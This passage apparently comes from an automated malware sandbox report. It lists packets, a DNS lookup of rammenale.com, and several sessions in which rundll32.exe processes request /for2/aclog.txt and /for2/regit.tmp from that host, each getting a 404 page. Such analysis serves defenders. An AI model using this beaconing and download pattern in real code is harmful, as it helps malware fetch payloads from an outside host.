              Aug 29, 2024 06:53:02.859755993 CEST49707443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:02.862966061 CEST49705443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:02.862971067 CEST44349705131.153.206.231192.168.2.5
              Aug 29, 2024 06:53:02.863002062 CEST49705443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:02.863020897 CEST49705443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:02.869529963 CEST44349708131.153.206.231192.168.2.5
              Aug 29, 2024 06:53:02.869600058 CEST49708443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:02.869606018 CEST44349708131.153.206.231192.168.2.5
              Aug 29, 2024 06:53:02.869646072 CEST49708443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:02.869668007 CEST44349708131.153.206.231192.168.2.5
              Aug 29, 2024 06:53:02.869714022 CEST49708443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:02.869718075 CEST44349708131.153.206.231192.168.2.5
              Aug 29, 2024 06:53:02.869757891 CEST49708443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:02.869884014 CEST49707443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:02.869898081 CEST44349707131.153.206.231192.168.2.5
              Aug 29, 2024 06:53:02.869915009 CEST49707443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:02.869937897 CEST49707443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:02.886594057 CEST49708443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:02.886600018 CEST44349708131.153.206.231192.168.2.5
              Aug 29, 2024 06:53:03.402896881 CEST49711443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:03.402935028 CEST44349711131.153.206.231192.168.2.5
              Aug 29, 2024 06:53:03.403053999 CEST49711443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:03.415760994 CEST49711443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:03.415776968 CEST44349711131.153.206.231192.168.2.5
              Aug 29, 2024 06:53:03.435412884 CEST49712443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:03.435440063 CEST44349712131.153.206.231192.168.2.5
              Aug 29, 2024 06:53:03.435590982 CEST49712443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:03.449331999 CEST49712443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:03.449346066 CEST44349712131.153.206.231192.168.2.5
              Aug 29, 2024 06:53:04.336998940 CEST44349711131.153.206.231192.168.2.5
              Aug 29, 2024 06:53:04.337080956 CEST49711443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:04.340647936 CEST49711443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:04.340662003 CEST44349711131.153.206.231192.168.2.5
              Aug 29, 2024 06:53:04.340898991 CEST44349711131.153.206.231192.168.2.5
              Aug 29, 2024 06:53:04.340956926 CEST49711443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:04.342361927 CEST49711443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:04.366029024 CEST44349712131.153.206.231192.168.2.5
              Aug 29, 2024 06:53:04.366090059 CEST49712443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:04.369883060 CEST49712443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:04.369901896 CEST44349712131.153.206.231192.168.2.5
              Aug 29, 2024 06:53:04.370142937 CEST44349712131.153.206.231192.168.2.5
              Aug 29, 2024 06:53:04.370202065 CEST49712443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:04.371881962 CEST49712443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:04.388499975 CEST44349711131.153.206.231192.168.2.5
              Aug 29, 2024 06:53:04.416510105 CEST44349712131.153.206.231192.168.2.5
              Aug 29, 2024 06:53:04.933275938 CEST44349711131.153.206.231192.168.2.5
              Aug 29, 2024 06:53:04.933334112 CEST49711443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:04.933346987 CEST44349711131.153.206.231192.168.2.5
              Aug 29, 2024 06:53:04.933392048 CEST49711443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:04.933404922 CEST44349711131.153.206.231192.168.2.5
              Aug 29, 2024 06:53:04.933450937 CEST49711443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:04.933456898 CEST44349711131.153.206.231192.168.2.5
              Aug 29, 2024 06:53:04.933471918 CEST44349711131.153.206.231192.168.2.5
              Aug 29, 2024 06:53:04.933495998 CEST49711443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:04.933520079 CEST49711443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:04.933886051 CEST49711443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:04.933897018 CEST44349711131.153.206.231192.168.2.5
              Aug 29, 2024 06:53:04.933906078 CEST49711443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:04.933957100 CEST49711443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:04.959599972 CEST44349712131.153.206.231192.168.2.5
              Aug 29, 2024 06:53:04.959691048 CEST49712443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:04.959702969 CEST44349712131.153.206.231192.168.2.5
              Aug 29, 2024 06:53:04.959777117 CEST49712443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:04.959778070 CEST44349712131.153.206.231192.168.2.5
              Aug 29, 2024 06:53:04.959858894 CEST49712443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:04.960093021 CEST49712443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:04.960093021 CEST49712443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:04.960103989 CEST44349712131.153.206.231192.168.2.5
              Aug 29, 2024 06:53:04.960231066 CEST49712443192.168.2.5131.153.206.231

              UDP Packets

              TimestampSource PortDest PortSource IPDest IP
              Aug 29, 2024 06:53:00.995357037 CEST4983453192.168.2.51.1.1.1
              Aug 29, 2024 06:53:01.276679039 CEST53498341.1.1.1192.168.2.5

              DNS Queries

              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              Aug 29, 2024 06:53:00.995357037 CEST192.168.2.51.1.1.10x689eStandard query (0)rammenale.comA (IP address)IN (0x0001)false

              DNS Answers

              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Aug 29, 2024 06:53:01.276679039 CEST1.1.1.1192.168.2.50x689eNo error (0)rammenale.com131.153.206.231A (IP address)IN (0x0001)false

              HTTP Request Dependency Graph

              • rammenale.com

              HTTPS Proxied Packets

              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              0192.168.2.549706131.153.206.2314431992C:\Windows\SysWOW64\rundll32.exe
              TimestampBytes transferredDirectionData
              2024-08-29 04:53:02 UTC287OUTGET /for2/aclog.txt HTTP/1.1
              Accept: */*
              Accept-Encoding: gzip, deflate
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
              Host: rammenale.com
              Connection: Keep-Alive
              2024-08-29 04:53:02 UTC416INHTTP/1.1 404 Not Found
              Connection: close
              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
              pragma: no-cache
              content-type: text/html
              content-length: 1251
              date: Thu, 29 Aug 2024 04:53:02 GMT
              server: LiteSpeed
              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
              2024-08-29 04:53:02 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
              2024-08-29 04:53:02 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
              Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              1192.168.2.549708131.153.206.2314432148C:\Windows\SysWOW64\rundll32.exe
              TimestampBytes transferredDirectionData
              2024-08-29 04:53:02 UTC287OUTGET /for2/regit.tmp HTTP/1.1
              Accept: */*
              Accept-Encoding: gzip, deflate
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
              Host: rammenale.com
              Connection: Keep-Alive
              2024-08-29 04:53:02 UTC416INHTTP/1.1 404 Not Found
              Connection: close
              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
              pragma: no-cache
              content-type: text/html
              content-length: 1251
              date: Thu, 29 Aug 2024 04:53:02 GMT
              server: LiteSpeed
              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
              2024-08-29 04:53:02 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
              2024-08-29 04:53:02 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
              Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              2192.168.2.549707131.153.206.2314431732C:\Windows\SysWOW64\rundll32.exe
              TimestampBytes transferredDirectionData
              2024-08-29 04:53:02 UTC287OUTGET /for2/regit.tmp HTTP/1.1
              Accept: */*
              Accept-Encoding: gzip, deflate
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
              Host: rammenale.com
              Connection: Keep-Alive
              2024-08-29 04:53:02 UTC416INHTTP/1.1 404 Not Found
              Connection: close
              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
              pragma: no-cache
              content-type: text/html
              content-length: 1251
              date: Thu, 29 Aug 2024 04:53:02 GMT
              server: LiteSpeed
              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
              2024-08-29 04:53:02 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
              2024-08-29 04:53:02 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
              Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              3192.168.2.549705131.153.206.2314435260C:\Windows\SysWOW64\rundll32.exe
              TimestampBytes transferredDirectionData
              2024-08-29 04:53:02 UTC287OUTGET /for2/aclog.txt HTTP/1.1
              Accept: */*
              Accept-Encoding: gzip, deflate
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
              Host: rammenale.com
              Connection: Keep-Alive
              2024-08-29 04:53:02 UTC416INHTTP/1.1 404 Not Found
              Connection: close
              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
              pragma: no-cache
              content-type: text/html
              content-length: 1251
              date: Thu, 29 Aug 2024 04:53:02 GMT
              server: LiteSpeed
              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
              2024-08-29 04:53:02 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
              2024-08-29 04:53:02 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
              Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              4192.168.2.549711131.153.206.2314435428C:\Windows\SysWOW64\rundll32.exe
              TimestampBytes transferredDirectionData
              2024-08-29 04:53:04 UTC287OUTGET /for2/regit.tmp HTTP/1.1
              Accept: */*
              Accept-Encoding: gzip, deflate
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
              Host: rammenale.com
              Connection: Keep-Alive
              2024-08-29 04:53:04 UTC416INHTTP/1.1 404 Not Found
              Connection: close
              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
              pragma: no-cache
              content-type: text/html
              content-length: 1251
              date: Thu, 29 Aug 2024 04:53:04 GMT
              server: LiteSpeed
              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
              2024-08-29 04:53:04 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
              2024-08-29 04:53:04 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
              Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              5192.168.2.549712131.153.206.2314435440C:\Windows\SysWOW64\rundll32.exe
              TimestampBytes transferredDirectionData
              2024-08-29 04:53:04 UTC287OUTGET /for2/aclog.txt HTTP/1.1
              Accept: */*
              Accept-Encoding: gzip, deflate
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
              Host: rammenale.com
              Connection: Keep-Alive
              2024-08-29 04:53:04 UTC416INHTTP/1.1 404 Not Found
              Connection: close
              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
              pragma: no-cache
              content-type: text/html
              content-length: 1251
              date: Thu, 29 Aug 2024 04:53:04 GMT
              server: LiteSpeed
              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
              2024-08-29 04:53:04 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
